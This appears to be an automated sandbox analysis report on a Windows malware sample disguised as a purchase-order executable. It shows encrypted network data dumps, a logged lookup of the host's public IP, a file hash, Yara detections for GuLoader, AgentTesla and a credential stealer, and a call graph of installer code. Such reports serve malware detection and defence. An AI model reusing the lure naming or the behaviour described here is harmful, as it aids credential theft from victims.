                                              Data Raw: 1e 6a c0 e5 c9 07 c3 29 2d 2e 58 47 df 81 14 4b c0 76 30 0f e5 1d 82 c9 61 e8 0b f2 00 cc d3 31 48 29 82 32 f6 5b 49 4a 6e d5 f1 2f 13 84 53 40 a9 1e 52 0a 2a 78 89 aa 30 97 9c 63 1d 05 96 da 78 42 42 e0 e8 0f 3d 47 e8 f2 86 dd 6b a3 2d 22 aa 3c 31 19 e8 78 42 8a b5 d8 2c c9 9a 18 46 d3 1c 48 81 05 96 89 0e e0 75 92 0f 32 06 23 eb 62 4e ab 4e 87 0f 36 12 aa 48 e7 8c dc 12 44 ed 26 ab 04 69 e4 c7 b4 41 75 35 73 74 30 0b dd 9b 7e 86 18 a0 ae 0a e6 10 da 2c 26 73 bf bf 7d 92 96 e6 f1 3a be ed b0 d8 52 82 9a 55 6a 34 1d 10 8a eb f4 a1 74 01 79 f6 b8 1b 16 f4 23 41 6f 8e d3 22 15 6d 30 5f 76 8f 05 77 cb 8d 52 98 be 38 b1 bb 47 90 73 2f 9c 39 04 eb 91 43 d3 e3 41 c9 4c 99 7a 3a 55 60 e1 c3 97 a6 32 5e 5c 86 06 50 e3 f2 5f 4f ea 75 49 f8 21 d6 3f b2 9e fb bd e9 1f 9d 2b ba 0a 4f a9 5e 4e 16 f6 a5 ec 15 89 6c ad 6c 3b 0e 17 e6 e4 dd 73 bc 37 99 a8 19 75 e2 a7 8c b2 a3 00 f4 af aa d2 07 fd e6 64 5b da 8a cf f8 41 86 6b 60 8f 59 6a 82 22 b5 67 e8 34 5b ba f3 d4 c5 4b 75 1c 68 9b 4a 95 ef da 1a 2b 74 cc 9b 54 [TRUNCATED]
                                              Data Ascii: j)-.XGKv0a1H)2[IJn/S@R*x0cxBB=Gk-"<1xB,FHu2#bNN6HD&iAu5st0~,&s}:RUj4ty#Ao"m0_vwR8Gs/9CALz:U`2^\P_OuI!?+O^Nll;s7ud[Ak`Yj"g4[KuhJ+tTOVn9<QYizCG]6^LFn@@=uAgi+\H%$4,v"?$?r@_qK{TyH]0idCO}J_'5?jQh;d%l*WK(I]_Eipz]Uxb,G~nbx/^3rV5hX(G3CS,Hq8!{c][yl44Z!v*ahl<Ro$/v.QP<@7}RRUIn<33kN+k=yv[x$MT9yMBO\ =#<97!+d0S54YSl.j+|]Wga<IhqW\$!Fkz>CM`"F-RVueM%+,_S3e/\#Y&Fq&@&]V]4;.s/@HFt1!yL$)%
                                              Dec 18, 2024 11:07:28.264082909 CET1236INData Raw: 8e 23 97 5c 2d f6 47 5f 64 3f 97 8c 72 cb e2 16 70 e7 a3 a7 98 fe 7b 35 12 47 f3 8c 02 3a cf d8 ac bb 66 c5 14 aa 0e 49 c9 b9 e7 37 40 21 b9 72 45 06 d2 65 5e 83 bd fb 5b 83 45 92 e9 15 a8 53 64 db 90 e1 fb f7 0d c1 e3 e2 91 b2 a4 c2 f9 a1 ef 59
                                              Data Ascii: #\-G_d?rp{5G:fI7@!rEe^[ESdY"UK{M/8$CJvQf[*[sB%?'yD]qOh\OKT/}1ElY1?9l>#<68kx8PSZ.2RNS
                                              Dec 18, 2024 11:07:28.264137030 CET1236INData Raw: 23 57 25 d2 e2 dc 05 88 33 46 b0 1a 69 d8 2d 2b 21 80 24 e7 40 09 f5 3b 4a 83 74 69 73 8c f4 13 4b 69 23 9a 25 69 4e 08 95 d6 39 a0 f6 93 6c 85 da 84 a8 66 c5 e1 a8 7c 4e e8 b9 97 9f 2d 21 46 74 6f 18 50 1e 47 83 3d 7f 71 a1 47 11 6b 8c 28 53 9f
                                              Data Ascii: #W%3Fi-+!$@;JtisKi#%iN9lf|N-!FtoPG=qGk(SZcSX$n<QVwPNM"?JC$\QF.squXir[9zY;K<0n^)~(t1,9I72p@+=HEZn##U+@^
                                              Dec 18, 2024 11:07:28.264174938 CET1236INData Raw: aa 0c 8d e2 8c e5 38 04 6c 29 67 82 d3 61 b8 34 7e f5 7d 07 d4 cb 83 90 8b 4e 90 9a 50 6f da 20 29 5a 59 26 95 5f 03 d7 49 61 17 a7 69 75 a2 c0 0f 32 8a f8 9a 21 47 46 28 94 a8 dc 7b f6 97 42 e5 c6 ae c0 ba c5 eb ae 24 eb cb ba 9a 6b c0 21 42 58
                                              Data Ascii: 8l)ga4~}NPo )ZY&_Iaiu2!GF({B$k!BX[)9QyFo(WXh-RzMB,%I).U6FyX%;6"p 7Y/J,c_-U1Ui=dBXDv:K<C
                                              Dec 18, 2024 11:07:28.264209986 CET896INData Raw: 4e 86 cc fa 9c 63 6e 85 68 48 88 f1 03 f7 4d 3b 68 b9 0c 03 c4 b2 e5 38 f0 e0 f8 67 a2 d6 4b a6 36 fb 26 44 09 d0 e1 a1 ba 82 31 42 9c 70 69 f0 3e 2b df 84 26 95 5b d7 f9 4b 62 4a 76 69 75 a6 14 10 09 ff 23 9a 21 6b 61 0a 96 ad 81 a3 f6 97 46 31
                                              Data Ascii: NcnhHM;h8gK6&D1Bpi>+&[KbJviu#!kaF1f;> aER=}E5!So{XQc=hSP5[GF,r8CTthl+sbh%~]9q9J"K_$%}U$pB&c7z]~
                                              Dec 18, 2024 11:07:28.340922117 CET1236INData Raw: 21 7b a3 f7 66 5d c1 b2 c9 7d e2 a0 94 0a c0 46 21 99 cb 8e a4 c8 5a 21 e4 36 74 7a c1 2a 41 6c 14 6c 0d a3 b9 3c ec 22 cd 76 0f 27 2f 5e 36 51 94 0a 91 de d4 50 92 ed 35 1e d1 46 5c ea 37 fd 0f d1 15 f5 f3 7a 52 4e ab 3c 6e 49 9e b3 1b e9 d2 d7
                                              Data Ascii: !{f]}F!Z!6tz*All<"v'/^6QP5F\7zRN<nIa$m!Q\y&4\W1bmo|~s'|Oz]Bx`@oPPxFM]7sR;%Y'L5A#Xb
                                              Dec 18, 2024 11:07:28.340960979 CET1236INData Raw: e0 33 d3 bd 5e 1b 2c 0c b9 e1 de 7b cd 5b 4d 33 e6 fc 6b 8b e1 66 a3 c6 49 c7 87 f4 58 99 0e db 5b 12 99 cb f4 50 21 56 20 ee fb bf 76 c2 20 9f 66 12 6c 35 11 da 3c ec ac 62 8e 03 0c 19 76 2e 5b 6a 0e e7 b1 2a 5c e6 c5 47 2f d0 40 a6 c3 30 fd 7d
                                              Data Ascii: 3^,{[M3kfIX[P!V v fl5<bv.[j*\G/@0}RN1FPa%)o*me\}T8[c$M4@<[lv%xwqk<~`S"i|bqFxpHX`~\:u-6sWMu\Tu;5<'L
                                              Dec 18, 2024 11:07:28.340986013 CET448INData Raw: 4b c5 1b 96 ef a7 1f 14 e9 35 5e 5d 58 af 29 6b 49 e1 33 f9 41 53 1e 2c da 83 e2 de 71 09 34 b1 cc 39 25 7b 8b e1 98 5c f2 54 c7 79 e2 a0 95 0f c0 14 36 99 cb fe fe d8 58 21 9e 36 aa 73 c2 2a 61 96 1a 6f 0d d1 24 30 ef 52 4f 84 03 24 2f 88 2f 68
                                              Data Ascii: K5^]X)kI3AS,q49%{\Ty6X!6s*ao$0RO$//h*\@}RONU8EZM7Pn"&"e|D|"4Z$70nvovq%r{9<1`S^%->i|rbqBxpajpx(6[G?[bQ
                                              Dec 18, 2024 11:07:28.341092110 CET1236INData Raw: 35 65 6a 74 6d 07 ed e8 11 40 d9 3e 9a 21 49 92 04 96 ab 81 b4 f6 97 46 31 d6 af bb 66 3b e7 a9 0e e9 c3 b9 e7 b7 3e 20 7f 6a 45 06 52 9b d2 82 3d 5b 53 83 45 12 64 5a 2a 53 eb 79 30 6a 7b f7 58 51 8c 83 fd d7 7a ba 95 81 bd 3a 51 9f a3 19 b8 14
                                              Data Ascii: 5ejtm@>!IF1f;> jER=[SEdZ*Sy0j{XQz:QPtMz\8$MWt.F]lUbO%%pQE0q"G^+T)*"%Cfa5B(lF=?k83)qWQ%e_p.0B4l
                                              Dec 18, 2024 11:07:28.341108084 CET1236INData Raw: 98 08 3c 42 9a 54 19 96 3d 2b 51 a2 66 95 5b 23 75 5b 62 6a 70 1b 13 a5 ea 61 18 b1 23 9a 2b c3 7d 0a 96 af d3 c6 f5 97 36 e7 98 ac bb 6c 45 f9 aa 0e cd bb 28 e5 b7 b0 09 06 72 45 0c d2 76 de 83 39 09 3d 80 45 62 3e 55 28 53 91 5b 04 61 7b f3 4e
                                              Data Ascii: <BT=+Qf[#u[bjpa#+}6lE(rEv9=Eb>U(S[a{N/9;Pw:M(aHCT~QhV[W>#pEQ09HbKYVA$GmGF4HHPA2Q/E/=R@
                                              Dec 18, 2024 11:07:28.383932114 CET1236INData Raw: 10 4d ec f8 6d 7c d9 4b a6 16 12 27 7d 07 2e ef ad 92 88 cd 4e 96 50 4b ea 3e 2b 21 74 27 ac 7e 29 f5 4b 9c 66 70 69 a5 ac ea 11 32 d9 61 9a 21 49 44 49 96 ab ab 05 fc 97 46 cd 26 a2 bd 66 e5 f0 aa 0e c9 37 b7 eb b7 c0 df 4a 7e 45 26 59 65 de 83
                                              Data Ascii: Mm|K'}.NPK>+!t'~)Kfpi2a!IDIF&f7J~E&YezbE$W_a{)<Q]-3{8CT QU-s[+=?QN9G"K_+Y1$cfLTJ>1K8@2L


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              0192.168.2.449759104.26.12.2054432128C:\Users\user\Desktop\PO 0309494059506060609696007.exe
                                              TimestampBytes transferredDirectionData
                                              2024-12-18 10:07:30 UTC155OUTGET / HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                              Host: api.ipify.org
                                              Connection: Keep-Alive
                                              2024-12-18 10:07:31 UTC424INHTTP/1.1 200 OK
                                              Date: Wed, 18 Dec 2024 10:07:31 GMT
                                              Content-Type: text/plain
                                              Content-Length: 12
                                              Connection: close
                                              Vary: Origin
                                              cf-cache-status: DYNAMIC
                                              Server: cloudflare
                                              CF-RAY: 8f3e58ab6dfd42e5-EWR
                                              server-timing: cfL4;desc="?proto=TCP&rtt=1571&min_rtt=1567&rtt_var=596&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2821&recv_bytes=769&delivery_rate=1821584&cwnd=221&unsent_bytes=0&cid=6c5cca530257901e&ts=450&x=0"
                                              2024-12-18 10:07:31 UTC12INData Raw: 38 2e 34 36 2e 31 32 33 2e 31 38 39
                                              Data Ascii: 8.46.123.189


                                              Click to jump to process

                                              Click to jump to process

                                              Click to dive into process behavior distribution

                                              Click to jump to process

                                              Target ID:0
                                              Start time:05:06:23
                                              Start date:18/12/2024
                                              Path:C:\Users\user\Desktop\PO 0309494059506060609696007.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\Desktop\PO 0309494059506060609696007.exe"
                                              Imagebase:0x400000
                                              File size:810'408 bytes
                                              MD5 hash:0BE2D87EDBE429042BF5EB8791A40BFD
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.2279273264.0000000004476000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                              Reputation:low
                                              Has exited:true

                                              Target ID:4
                                              Start time:05:07:20
                                              Start date:18/12/2024
                                              Path:C:\Users\user\Desktop\PO 0309494059506060609696007.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\Desktop\PO 0309494059506060609696007.exe"
                                              Imagebase:0x400000
                                              File size:810'408 bytes
                                              MD5 hash:0BE2D87EDBE429042BF5EB8791A40BFD
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.2985734284.00000000332AC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.2985734284.0000000033281000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.2985734284.0000000033281000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              Reputation:low
                                              Has exited:false

                                              Reset < >

                                                Execution Graph

                                                Execution Coverage:23.5%
                                                Dynamic/Decrypted Code Coverage:0%
                                                Signature Coverage:19.5%
                                                Total number of Nodes:1548
                                                Total number of Limit Nodes:40
                                                execution_graph 3855 4015c1 3874 402c41 3855->3874 3859 401631 3861 401663 3859->3861 3862 401636 3859->3862 3865 401423 24 API calls 3861->3865 3898 401423 3862->3898 3872 40165b 3865->3872 3869 40164a SetCurrentDirectoryW 3869->3872 3870 4015d1 3870->3859 3871 401617 GetFileAttributesW 3870->3871 3886 405bbc 3870->3886 3890 40588b 3870->3890 3893 4057f1 CreateDirectoryW 3870->3893 3902 40586e CreateDirectoryW 3870->3902 3871->3870 3875 402c4d 3874->3875 3905 4062dc 3875->3905 3878 4015c8 3880 405c3a CharNextW CharNextW 3878->3880 3881 405c57 3880->3881 3884 405c69 3880->3884 3883 405c64 CharNextW 3881->3883 3881->3884 3882 405c8d 3882->3870 3883->3882 3884->3882 3885 405bbc CharNextW 3884->3885 3885->3884 3887 405bc2 3886->3887 3888 405bd8 3887->3888 3889 405bc9 CharNextW 3887->3889 3888->3870 3889->3887 3943 406694 GetModuleHandleA 3890->3943 3894 405842 GetLastError 3893->3894 3895 40583e 3893->3895 3894->3895 3896 405851 SetFileSecurityW 3894->3896 3895->3870 3896->3895 3897 405867 GetLastError 3896->3897 3897->3895 3952 405322 3898->3952 3901 4062ba lstrcpynW 3901->3869 3903 405882 GetLastError 3902->3903 3904 40587e 3902->3904 3903->3904 3904->3870 3909 4062e9 3905->3909 3906 406534 3907 402c6e 3906->3907 3938 4062ba lstrcpynW 3906->3938 3907->3878 3922 40654e 3907->3922 3909->3906 3910 406502 lstrlenW 3909->3910 3912 4062dc 10 API calls 3909->3912 3915 406417 GetSystemDirectoryW 3909->3915 3916 40642a GetWindowsDirectoryW 3909->3916 3917 40654e 5 API calls 3909->3917 3918 4062dc 10 API calls 3909->3918 3919 4064a5 lstrcatW 3909->3919 3920 40645e SHGetSpecialFolderLocation 3909->3920 3931 406188 3909->3931 3936 406201 wsprintfW 3909->3936 3937 4062ba lstrcpynW 3909->3937 3910->3909 3912->3910 3915->3909 3916->3909 3917->3909 3918->3909 3919->3909 3920->3909 3921 406476 SHGetPathFromIDListW CoTaskMemFree 3920->3921 3921->3909 3929 40655b 3922->3929 3923 4065d6 CharPrevW 3927 4065d1 3923->3927 3924 4065c4 CharNextW 3924->3927 3924->3929 3925 4065f7 3925->3878 3926 405bbc CharNextW 3926->3929 3927->3923 3927->3925 3928 4065b0 CharNextW 3928->3929 3929->3924 3929->3926 3929->3927 3929->3928 3930 4065bf CharNextW 3929->3930 3930->3924 3939 406127 3931->3939 3934 4061ec 3934->3909 3935 4061bc RegQueryValueExW RegCloseKey 3935->3934 3936->3909 3937->3909 3938->3907 3940 406136 3939->3940 3941 40613a 3940->3941 3942 40613f RegOpenKeyExW 3940->3942 3941->3934 3941->3935 3942->3941 3944 4066b0 3943->3944 3945 4066ba GetProcAddress 3943->3945 3949 406624 GetSystemDirectoryW 3944->3949 3947 405892 3945->3947 3947->3870 3948 4066b6 3948->3945 3948->3947 3950 406646 wsprintfW LoadLibraryExW 3949->3950 3950->3948 3953 40533d 3952->3953 3954 401431 3952->3954 3955 405359 lstrlenW 3953->3955 3956 4062dc 17 API calls 3953->3956 3954->3901 3957 405382 3955->3957 3958 405367 lstrlenW 3955->3958 3956->3955 3960 405395 3957->3960 3961 405388 SetWindowTextW 3957->3961 3958->3954 3959 405379 lstrcatW 3958->3959 3959->3957 3960->3954 3962 40539b SendMessageW SendMessageW SendMessageW 3960->3962 3961->3960 3962->3954 3963 401941 3964 401943 3963->3964 3965 402c41 17 API calls 3964->3965 3966 401948 3965->3966 3969 4059cc 3966->3969 4008 405c97 3969->4008 3972 4059f4 DeleteFileW 3979 401951 3972->3979 3973 405a0b 3976 405b2b 3973->3976 4022 4062ba lstrcpynW 3973->4022 3975 405a31 3977 405a44 3975->3977 3978 405a37 lstrcatW 3975->3978 3976->3979 4040 4065fd FindFirstFileW 3976->4040 4023 405bdb lstrlenW 3977->4023 3980 405a4a 3978->3980 3983 405a5a lstrcatW 3980->3983 3985 405a65 lstrlenW FindFirstFileW 3980->3985 3983->3985 3985->3976 3993 405a87 3985->3993 3986 405b54 4043 405b8f lstrlenW CharPrevW 3986->4043 3989 405984 5 API calls 3992 405b66 3989->3992 3991 405b0e FindNextFileW 3991->3993 3994 405b24 FindClose 3991->3994 3995 405b80 3992->3995 3996 405b6a 3992->3996 3993->3991 4004 405acf 3993->4004 4027 4062ba lstrcpynW 3993->4027 3994->3976 3998 405322 24 API calls 3995->3998 3996->3979 3999 405322 24 API calls 3996->3999 3998->3979 4001 405b77 3999->4001 4000 4059cc 60 API calls 4000->4004 4003 406080 36 API calls 4001->4003 4002 405322 24 API calls 4002->3991 4005 405b7e 4003->4005 4004->3991 4004->4000 4004->4002 4006 405322 24 API calls 4004->4006 4028 405984 4004->4028 4036 406080 MoveFileExW 4004->4036 4005->3979 4006->4004 4046 4062ba lstrcpynW 4008->4046 4010 405ca8 4011 405c3a 4 API calls 4010->4011 4012 405cae 4011->4012 4013 4059ec 4012->4013 4014 40654e 5 API calls 4012->4014 4013->3972 4013->3973 4020 405cbe 4014->4020 4015 405cef lstrlenW 4016 405cfa 4015->4016 4015->4020 4017 405b8f 3 API calls 4016->4017 4019 405cff GetFileAttributesW 4017->4019 4018 4065fd 2 API calls 4018->4020 4019->4013 4020->4013 4020->4015 4020->4018 4021 405bdb 2 API calls 4020->4021 4021->4015 4022->3975 4024 405be9 4023->4024 4025 405bfb 4024->4025 4026 405bef CharPrevW 4024->4026 4025->3980 4026->4024 4026->4025 4027->3993 4047 405d8b GetFileAttributesW 4028->4047 4031 4059b1 4031->4004 4032 4059a7 DeleteFileW 4034 4059ad 4032->4034 4033 40599f RemoveDirectoryW 4033->4034 4034->4031 4035 4059bd SetFileAttributesW 4034->4035 4035->4031 4037 4060a1 4036->4037 4038 406094 4036->4038 4037->4004 4050 405f06 4038->4050 4041 406613 FindClose 4040->4041 4042 405b50 4040->4042 4041->4042 4042->3979 4042->3986 4044 405b5a 4043->4044 4045 405bab lstrcatW 4043->4045 4044->3989 4045->4044 4046->4010 4048 405990 4047->4048 4049 405d9d SetFileAttributesW 4047->4049 4048->4031 4048->4032 4048->4033 4049->4048 4051 405f36 4050->4051 4052 405f5c GetShortPathNameW 4050->4052 4077 405db0 GetFileAttributesW CreateFileW 4051->4077 4054 405f71 4052->4054 4055 40607b 4052->4055 4054->4055 4056 405f79 wsprintfA 4054->4056 4055->4037 4058 4062dc 17 API calls 4056->4058 4057 405f40 CloseHandle GetShortPathNameW 4057->4055 4059 405f54 4057->4059 4060 405fa1 4058->4060 4059->4052 4059->4055 4078 405db0 GetFileAttributesW CreateFileW 4060->4078 4062 405fae 4062->4055 4063 405fbd GetFileSize GlobalAlloc 4062->4063 4064 406074 CloseHandle 4063->4064 4065 405fdf 4063->4065 4064->4055 4079 405e33 ReadFile 4065->4079 4070 406012 4072 405d15 4 API calls 4070->4072 4071 405ffe lstrcpyA 4073 406020 4071->4073 4072->4073 4074 406057 SetFilePointer 4073->4074 4086 405e62 WriteFile 4074->4086 4077->4057 4078->4062 4080 405e51 4079->4080 4080->4064 4081 405d15 lstrlenA 4080->4081 4082 405d56 lstrlenA 4081->4082 4083 405d5e 4082->4083 4084 405d2f lstrcmpiA 4082->4084 4083->4070 4083->4071 4084->4083 4085 405d4d CharNextA 4084->4085 4085->4082 4087 405e80 GlobalFree 4086->4087 4087->4064 4149 401e49 4157 402c1f 4149->4157 4151 401e4f 4152 402c1f 17 API calls 4151->4152 4153 401e5b 4152->4153 4154 401e72 EnableWindow 4153->4154 4155 401e67 ShowWindow 4153->4155 4156 402ac5 4154->4156 4155->4156 4158 4062dc 17 API calls 4157->4158 4159 402c34 4158->4159 4159->4151 4160 40264a 4161 402c1f 17 API calls 4160->4161 4169 402659 4161->4169 4162 402796 4163 4026a3 ReadFile 4163->4162 4163->4169 4164 405e33 ReadFile 4164->4169 4165 40273c 4165->4162 4165->4169 4174 405e91 SetFilePointer 4165->4174 4166 4026e3 MultiByteToWideChar 4166->4169 4167 402798 4183 406201 wsprintfW 4167->4183 4169->4162 4169->4163 4169->4164 4169->4165 4169->4166 4169->4167 4171 402709 SetFilePointer MultiByteToWideChar 4169->4171 4173 4027a9 4169->4173 4171->4169 4172 4027ca SetFilePointer 4172->4162 4173->4162 4173->4172 4175 405ead 4174->4175 4178 405ec5 4174->4178 4176 405e33 ReadFile 4175->4176 4177 405eb9 4176->4177 4177->4178 4179 405ef6 SetFilePointer 4177->4179 4180 405ece SetFilePointer 4177->4180 4178->4165 4179->4178 4180->4179 4181 405ed9 4180->4181 4182 405e62 WriteFile 4181->4182 4182->4178 4183->4162 5010 4016cc 5011 402c41 17 API calls 5010->5011 5012 4016d2 GetFullPathNameW 5011->5012 5013 4016ec 5012->5013 5019 40170e 5012->5019 5016 4065fd 2 API calls 5013->5016 5013->5019 5014 401723 GetShortPathNameW 5015 402ac5 5014->5015 5017 4016fe 5016->5017 5017->5019 5020 4062ba lstrcpynW 5017->5020 5019->5014 5019->5015 5020->5019 4194 40234e 4195 402c41 17 API calls 4194->4195 4196 40235d 4195->4196 4197 402c41 17 API calls 4196->4197 4198 402366 4197->4198 4199 402c41 17 API calls 4198->4199 4200 402370 GetPrivateProfileStringW 4199->4200 5021 401b53 5022 402c41 17 API calls 5021->5022 5023 401b5a 5022->5023 5024 402c1f 17 API calls 5023->5024 5025 401b63 wsprintfW 5024->5025 5026 402ac5 5025->5026 5027 6e422c57 5028 6e422c6f 5027->5028 5029 6e42158f 2 API calls 5028->5029 5030 6e422c8a 5029->5030 5031 6e4216d4 5032 6e421703 5031->5032 5033 6e421b5f 22 API calls 5032->5033 5034 6e42170a 5033->5034 5035 6e421711 5034->5035 5036 6e42171d 5034->5036 5037 6e421272 2 API calls 5035->5037 5038 6e421727 5036->5038 5039 6e421744 5036->5039 5042 6e42171b 5037->5042 5043 6e42153d 3 API calls 5038->5043 5040 6e42174a 5039->5040 5041 6e42176e 5039->5041 5044 6e4215b4 3 API calls 5040->5044 5045 6e42153d 3 API calls 5041->5045 5046 6e42172c 5043->5046 5047 6e42174f 5044->5047 5045->5042 5048 6e4215b4 3 API calls 5046->5048 5050 6e421272 2 API calls 5047->5050 5049 6e421732 5048->5049 5051 6e421272 2 API calls 5049->5051 5052 6e421755 GlobalFree 5050->5052 5053 6e421738 GlobalFree 5051->5053 5052->5042 5054 6e421769 GlobalFree 5052->5054 5053->5042 5054->5042 5055 401956 5056 402c41 17 API calls 5055->5056 5057 40195d lstrlenW 5056->5057 5058 402592 5057->5058 5059 4014d7 5060 402c1f 17 API calls 5059->5060 5061 4014dd Sleep 5060->5061 5063 402ac5 5061->5063 4514 403d58 4515 403d70 4514->4515 4516 403eab 4514->4516 4515->4516 4517 403d7c 4515->4517 4518 403efc 4516->4518 4519 403ebc GetDlgItem GetDlgItem 4516->4519 4521 403d87 SetWindowPos 4517->4521 4522 403d9a 4517->4522 4520 403f56 4518->4520 4528 401389 2 API calls 4518->4528 4523 404231 18 API calls 4519->4523 4524 40427d SendMessageW 4520->4524 4529 403ea6 4520->4529 4521->4522 4525 403db7 4522->4525 4526 403d9f ShowWindow 4522->4526 4527 403ee6 SetClassLongW 4523->4527 4553 403f68 4524->4553 4530 403dd9 4525->4530 4531 403dbf DestroyWindow 4525->4531 4526->4525 4532 40140b 2 API calls 4527->4532 4535 403f2e 4528->4535 4533 403dde SetWindowLongW 4530->4533 4534 403def 4530->4534 4536 4041ba 4531->4536 4532->4518 4533->4529 4537 403e98 4534->4537 4538 403dfb GetDlgItem 4534->4538 4535->4520 4539 403f32 SendMessageW 4535->4539 4536->4529 4545 4041eb ShowWindow 4536->4545 4594 404298 4537->4594 4542 403e2b 4538->4542 4543 403e0e SendMessageW IsWindowEnabled 4538->4543 4539->4529 4540 40140b 2 API calls 4540->4553 4541 4041bc DestroyWindow EndDialog 4541->4536 4547 403e38 4542->4547 4550 403e7f SendMessageW 4542->4550 4551 403e4b 4542->4551 4559 403e30 4542->4559 4543->4529 4543->4542 4545->4529 4546 4062dc 17 API calls 4546->4553 4547->4550 4547->4559 4549 404231 18 API calls 4549->4553 4550->4537 4554 403e53 4551->4554 4555 403e68 4551->4555 4552 403e66 4552->4537 4553->4529 4553->4540 4553->4541 4553->4546 4553->4549 4576 4040fc DestroyWindow 4553->4576 4585 404231 4553->4585 4557 40140b 2 API calls 4554->4557 4556 40140b 2 API calls 4555->4556 4558 403e6f 4556->4558 4557->4559 4558->4537 4558->4559 4591 40420a 4559->4591 4561 403fe3 GetDlgItem 4562 404000 ShowWindow KiUserCallbackDispatcher 4561->4562 4563 403ff8 4561->4563 4588 404253 KiUserCallbackDispatcher 4562->4588 4563->4562 4565 40402a EnableWindow 4570 40403e 4565->4570 4566 404043 GetSystemMenu EnableMenuItem SendMessageW 4567 404073 SendMessageW 4566->4567 4566->4570 4567->4570 4569 403d39 18 API calls 4569->4570 4570->4566 4570->4569 4589 404266 SendMessageW 4570->4589 4590 4062ba lstrcpynW 4570->4590 4572 4040a2 lstrlenW 4573 4062dc 17 API calls 4572->4573 4574 4040b8 SetWindowTextW 4573->4574 4575 401389 2 API calls 4574->4575 4575->4553 4576->4536 4577 404116 CreateDialogParamW 4576->4577 4577->4536 4578 404149 4577->4578 4579 404231 18 API calls 4578->4579 4580 404154 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4579->4580 4581 401389 2 API calls 4580->4581 4582 40419a 4581->4582 4582->4529 4583 4041a2 ShowWindow 4582->4583 4584 40427d SendMessageW 4583->4584 4584->4536 4586 4062dc 17 API calls 4585->4586 4587 40423c SetDlgItemTextW 4586->4587 4587->4561 4588->4565 4589->4570 4590->4572 4592 404211 4591->4592 4593 404217 SendMessageW 4591->4593 4592->4593 4593->4552 4595 4042b0 GetWindowLongW 4594->4595 4596 40435b 4594->4596 4595->4596 4597 4042c5 4595->4597 4596->4529 4597->4596 4598 4042f2 GetSysColor 4597->4598 4599 4042f5 4597->4599 4598->4599 4600 404305 SetBkMode 4599->4600 4601 4042fb SetTextColor 4599->4601 4602 404323 4600->4602 4603 40431d GetSysColor 4600->4603 4601->4600 4604 404334 4602->4604 4605 40432a SetBkColor 4602->4605 4603->4602 4604->4596 4606 404347 DeleteObject 4604->4606 4607 40434e CreateBrushIndirect 4604->4607 4605->4604 4606->4607 4607->4596 5064 401f58 5065 402c41 17 API calls 5064->5065 5066 401f5f 5065->5066 5067 4065fd 2 API calls 5066->5067 5068 401f65 5067->5068 5070 401f76 5068->5070 5071 406201 wsprintfW 5068->5071 5071->5070 4608 402259 4609 402c41 17 API calls 4608->4609 4610 40225f 4609->4610 4611 402c41 17 API calls 4610->4611 4612 402268 4611->4612 4613 402c41 17 API calls 4612->4613 4614 402271 4613->4614 4615 4065fd 2 API calls 4614->4615 4616 40227a 4615->4616 4617 40228b lstrlenW lstrlenW 4616->4617 4618 40227e 4616->4618 4620 405322 24 API calls 4617->4620 4619 405322 24 API calls 4618->4619 4622 402286 4619->4622 4621 4022c9 SHFileOperationW 4620->4621 4621->4618 4621->4622 5072 6e421058 5074 6e421074 5072->5074 5073 6e4210dd 5074->5073 5076 6e421092 5074->5076 5085 6e421516 5074->5085 5077 6e421516 GlobalFree 5076->5077 5078 6e4210a2 5077->5078 5079 6e4210b2 5078->5079 5080 6e4210a9 GlobalSize 5078->5080 5081 6e4210b6 GlobalAlloc 5079->5081 5082 6e4210c7 5079->5082 5080->5079 5083 6e42153d 3 API calls 5081->5083 5084 6e4210d2 GlobalFree 5082->5084 5083->5082 5084->5073 5087 6e42151c 5085->5087 5086 6e421522 5086->5076 5087->5086 5088 6e42152e GlobalFree 5087->5088 5088->5076 5089 6e4218d9 5090 6e4218fc 5089->5090 5091 6e421931 GlobalFree 5090->5091 5092 6e421943 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 5090->5092 5091->5092 5093 6e421272 2 API calls 5092->5093 5094 6e421ace GlobalFree GlobalFree 5093->5094 5095 4046db 5096 404711 5095->5096 5097 4046eb 5095->5097 5099 404298 8 API calls 5096->5099 5098 404231 18 API calls 5097->5098 5100 4046f8 SetDlgItemTextW 5098->5100 5101 40471d 5099->5101 5100->5096 4623 40175c 4624 402c41 17 API calls 4623->4624 4625 401763 4624->4625 4626 405ddf 2 API calls 4625->4626 4627 40176a 4626->4627 4628 405ddf 2 API calls 4627->4628 4628->4627 5102 4022dd 5103 4022f7 5102->5103 5104 4022e4 5102->5104 5105 4062dc 17 API calls 5104->5105 5106 4022f1 5105->5106 5107 405920 MessageBoxIndirectW 5106->5107 5107->5103 5108 401d5d GetDlgItem GetClientRect 5109 402c41 17 API calls 5108->5109 5110 401d8f LoadImageW SendMessageW 5109->5110 5111 402ac5 5110->5111 5112 401dad DeleteObject 5110->5112 5112->5111 4651 405461 4652 405482 GetDlgItem GetDlgItem GetDlgItem 4651->4652 4653 40560b 4651->4653 4697 404266 SendMessageW 4652->4697 4655 405614 GetDlgItem CreateThread CloseHandle 4653->4655 4657 40563c 4653->4657 4655->4657 4700 4053f5 5 API calls 4655->4700 4656 405667 4661 405673 4656->4661 4662 4056c7 4656->4662 4657->4656 4659 405653 ShowWindow ShowWindow 4657->4659 4660 40568c 4657->4660 4658 4054f2 4664 4054f9 GetClientRect GetSystemMetrics SendMessageW SendMessageW 4658->4664 4699 